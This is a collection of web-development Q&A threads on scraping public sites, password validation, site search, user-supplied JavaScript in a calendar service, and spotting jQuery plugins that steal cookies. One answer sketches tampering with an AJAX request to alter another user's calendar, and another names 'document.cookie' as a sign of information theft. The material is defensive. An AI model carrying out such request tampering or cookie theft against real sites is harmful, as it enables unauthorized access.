I work in a small healthcare related office and we often have to look up license and other related official numbers of physicians. We use websites that are free and available to the public to do so. I've been tasked with figuring out a way to enter in the physician name and then return the results from all of the websites in a single entry to reduce the amount of time spent going through each website. I'm familiar with javascript, php and ruby but by no means an expert. My question is, where should I start? I don't need anyone to write the code for me or anything, but I can't seem to form the right question to google for some answers. I'm fairly sure this is possible, just not sure where to start developing my idea. Any help would be appreciated.

It sounds like you need to do some screen scraping, which may or may not be allowed by the terms and conditions of the sites you're using - you should check that first.
If there aren't any restrictions on automatic retrieval and querying, you'll want to read up on PHP's cURL module, and simulate the form actions that are performed when you manually query the sites. You can use your browser's developer console to see what scripts and pages are called when you run queries - it's quicker than trying to work it out from the page source.
You'll get back the HTML from the pages, which you'll need to parse. Depending on the format on the page, a few simple regexes might do the trick, but you'll likely need to tailor them for each site you query.
Again, please double check that the sites you're using allow you to run scripted queries - if you're in any doubt, you should email them and explain what you plan to do, and ask if they're ok with it.


HTML+javascript or javascript +jsp?

Hi I'm new to dynamic web dev. I've searched this site but couldn't find anything similar.
I want to implement a password checker, for robustness and length etc. Fairly conventional. The thing is, I have 2 options: 1. embed javascript inside an HTML. 2. embed javascript inside a jsp file.
With a little preliminary research it seems that most people recommend the former, that is to go with HTML. I wanna know why? I could be completely wrong, in that case I also wanna know why?
The "how" isn't all that important, but "why".
Edit: I know this question is full of flaws (for example JSP and HTML aren't mutually exclusive) but please indulge me a little bit and tell me which scheme is more appropriate, if I want to get things done front end, in a user's browser.
Edit#2 : Sorry I did not provide any bg information: I am working on a larger project and password checker is just a part of it, the project itself is a dynamic web project relies predominantly on java, serverlet.
As you state you are new to dynamic web dev. JSP is a server side programming language Just like PHP and others. If you want to confirm password, you can use ajax to check for a match from your database and if match was found create a session and redirect your user to the logged in page. If i misunderstood your question, please try to be clear enough.
Depends on your use-case. In some cases, just the front-end is enough. In many, I would say both is better.
By putting it in the front-end/client-side (the "HTML"), you create a more user-friendly approach, since you can rapidly and continuously evaluate the users' input and give them feedback.
If the application doesn't need to be particularly robust from a security perspective, this can be plenty.
The downside of HTML only validation of any user input is that it can easily be bypassed. As a programmer, I could figure out what its doing and easily bypass any and all client-side protects. Users can also wholesale just disable JavaScript, so if your site works without JavaScript in general, they won't get any validation. This is why "security" on the client side is never a thing. Never trust the client.
Implementing it only on the back-end/server-side ("JSP"), you can lock down the security since the end-user can't bypass any of your validation. It must match the rules you set forth.
The downside to server-side is that you must send the data to the server to be analyzed, then wait for a response. While this may be fast, its still much slower than client-side.
By doing it in both, you get the best of both worlds. You get the rapid feedback for the end-user without having to send any data to the server, and you get the full protections of making sure it is properly validated on the server-side.
The downside to this of course is you have to double-up on your code, so its more effort. That's why you want to weight the pros and cons in your particular case, as there isn't a single "best" answer.
If the HTML is enough for you - why should you use .jsp?
You need .jsp for creating dynamic content and it's gonna be compiled as Servlet - do you actually need Servlet in this case?
If security is not a big concern then HTML + javascript should be fine. It will be responsive amd lead to better user experience.
If this is an external facing application on the web then as mentioned in some of the other answers go with Jsp approach.

How do I add a full site search to a website in Javascript/jQuery?

I am creating a HTML5 website and I need to create a site search box that
displays results in a results page with description and photo.
How would I go about this.
I have looked alot and only see google search and thats not what im after.
Can this be done without PHP or RAILS?
Looking for purely JS and html5 and css and jquery.
Thanks and a point i the correct direction would be great.
Example is this Wordpress sites search http://agroamerica.com/
I dont want to use WP but hand code it.
Any help is great.
Your best bet, given that you don't want to implement a third party indexing service, would be to set an indexing function on your server's back end to handle search requests. You mentioned Rails, and there are some pretty great gems for this.
One point of trouble you will have with this question is that, in my experience, full site search functionality without a back end / database to query is not a very useful solution for any applications I've seen.
However, given that you want to keep it JS, you might look into the MEAN stack (MongoDB, Express.js, Angular.js, Node.js) which does some pretty sweet things like two-way data binding. It's a pure Javascript solution (albeit not a purely-front end solution).
Honestly, it sounds like you might be taking too big of bites to start off with. Try working through a scripting language on a site like Code Academy and learning about basic web application setups like MVC (a common way to handle different parts of a web application (used by the aforementioned Rails)). Stack Overflow users can be pretty brutal when you ask questions about advanced functionality without some understanding of the functionality's underlying elements or functional requirements, and search engines from the ground up have historically been the thing of doctoral dissertations.
Good luck!

Saving & embedding user's own javascript code

I'm hosting a small service where people can create online calendars. I'm playing with the idea of allowing users to save & embed their own javascript/html/css to their calendars.
I'm a bit worried about the security implications - are there ways to use XSS etc so that the users javascript code could affect some other calendars besides the one where the code is embedded?
From the customers perspective, the JS on the page should be allowed to change all the aspects of the page.
I guess the safest way would be to only allow custom HTML/CSS, but the ability to modify the layout and functionality of the calendar with JS would be a nice feature to have.
This can be very dangerous, for the same reason that
eval is evil
You're basically giving the user an oportunity to run malicious scripts.
Example: You are using AJAX to update something on your server. I come along, open up my trusty Firebug, see the AJAX request, and decide to wreck a little havoc, because thats what I do. I just rewrite the AJAX call, change the id of my calender to some random one, and bam, thats my dirty deed for the day.

How can we find the downloaded jquery plugin trying to connect to its developers site?

I am usually downloading several jQuery plugings.
How can I check whether the script is stealing any information (such as user cookie, session id..) and sending to its developer's server?
In php, we are checking backdoor scripts by looking for some functions (system, passthru, shell_exec, etc). Is there any such type of function in JavaScript to connect to its developers site?
Obviously, your first step should be to read the code. There are a number of tell-tale signs you can look for, including looking for URLs in the code, and any encrypted code.
Of course, some code may be too complex to make this a realistic suggestion, particularly if it's been minified and obfuscated, but it should be possible to scan through it. If it is doing anything like this, it'll be using the same functions it uses to communicated with your own site (ie jQuery's ajax functions), so you won't see specific function calls that raise suspicion, but suspect URLs in the code should be checked out, and you should definitely avoid encrypted code (obfuscated is generally okay, but not encrypted).
Secondly, search the internet for other people commenting about the plugin. If there is anything untoward happening, its likely that other people will have noticed it. Avoid using plugins that don't have enough users to get any comments one way or the other.
Finally, use a tool like Firebug to watch for HTTP requests that occur while you're using a site containing the plugin. If it's communicating with base, it can't hide from you; the browser's debugging tools will happily show you what you need to know.
Hope that helps.
I don't think you can do anything else than read the whole code, and check if it is stealing anything.
Another thing you could do, is to search in the codes after words like 'document.cookie' and 'navigator' and other things that are necesary for stealing information.

What would be the most ethical way to consume content from a site that is not providing an API? [closed]

I was wondering what would be the most ethical way to consume some bytes (386 precisely) of content from a given Site A, with an application (e.g. Google App Engine) in some Site B, but doing it right, no scraping intended, I really just need to check the status of a public service and they're currently not providing any API. So the markup in Site A has a JavaScript array with the info I need and being able to access that let's say once every five minutes would suffice.
Any advice will be much appreciated.
First all thanks much for the feedback. Site A is basically the website of the company that currently runs our public subway network, so I'm planning to develop a tiny free Android app for anyone to have not only a map with the whole network and its stations but also updated information about the availability of the service (and those are the bytes I will eventually be consuming), etcétera.
There will be some very differents points of view, but hopefully here is some food for thought:
Ask the site owner first, if they know ahead of time they are less likely to be annoyed.
Is the content on Site A accessible on a public part of the site, e.g. without the need to log in?
If the answer to #2 is that it is public content, then I wouldn't see an issue, as scraping the site for that information is really no different then pointing your browser at the site and reading it for yourself.
Of course, the answer to #3 is dependent on how the site is monetised. If Site A provides advertistment for generating revenue for the site, then it might not be an idea to start scraping content, as you would be bypassing how the site makes money.
I think the most important thing to do, is talk to the site owner first, and determine straight from them if:
Is it ok for me to be scraping content from their site.
Do they have an API in the pipeline (simply highlighting the desire may prompt them to consider it).
Just my point of view...
Update (4 years later): The question specifically embraces the ethical side of the problem. That's why this old answer is written in this way.
Typically in such situation you contact them.
If they don't like it, then ethically you can't do it (legally is another story, depending on providing license on the site or not. what login/anonymousity or other restrictions they have for access, do you have to use test/fake data, etc...).
If they allow it, they may provide an API (might involve costs - will be up to you to determine how much the fature is worth to your app), or promise some sort of expected behavior for you, which might itself be scrapping, or whatever other option they decide.
If they allow it but not ready to help make it easier, then scraping (with its other downsides still applicable) will be right, at least "ethically".
I would not touch it save for emailing the site admin, then getting their written permission.
That being said -- if you're consuming the content yet not extracting value beyond the value
a single user gets when observing the data you need from them, it's arguable that any
TOU they have wouldn't find you in violation. If however you get noteworthy value beyond
what a single user would get from the data you need from their site -- ie., let's say you use
the data then your results end up providing value to 100x of your own site's users -- I'd say
you need express permission to do that, to sleep well at night.
All that's off however if the info is already in the public domain (and you can prove it),
or the data you need from them is under some type of 'open license' such as from GNU.
Then again, the web is nothing without links to others' content. We all capture then re-post
stuff on various forums, say -- we read an article on cnn then comment on it in an online forum,
maybe quote the article, and provide a link back to it. Just depends I guess on how flexible
and open-minded the site's admin and owner are. But really, to avoid being sued (if push
comes to shove) I'd get permission.
Use a user-agent header which identifies your service.
Check their robots.txt (and re-check it at regular intervals, e.g. daily).
Respect any Disallow in a record that matches your user agent (be liberal in interpreting the name). If there is no record for your user-agent, use the record for User-agent: *.
Respect the (non-standard) Crawl-delay, which tells you how many seconds you should wait before requesting a resource from that host again.
"no scraping intended" - You are intending to scrape. =)
The only reasonable ethics-based reasons one should not take it from their website is:
They may wish to display advertisements or important security notices to users
This may make their statistics inaccurate
In terms of hammering their site, it is probably not an issue. But if it is:
You probably wish to scrape the minimal amount necessary (e.g. make the minimal number of HTTP requests), and not hammer the server too often.
You probably do not wish to have all your apps query the website; you could have your own website query them via a cronjob. This will allow you better control in case they change their formatting, or let you throw "service currently unavailable" errors to your users, just by changing your website; it introduces another point of failure, but it's probably worth it. This way if there's a bug, people don't need to update their apps.
But the best thing you can do is to talk to the website, asking them what is best. They may have a hidden API they would allow you to use, and perhaps have allowed others to use as well.

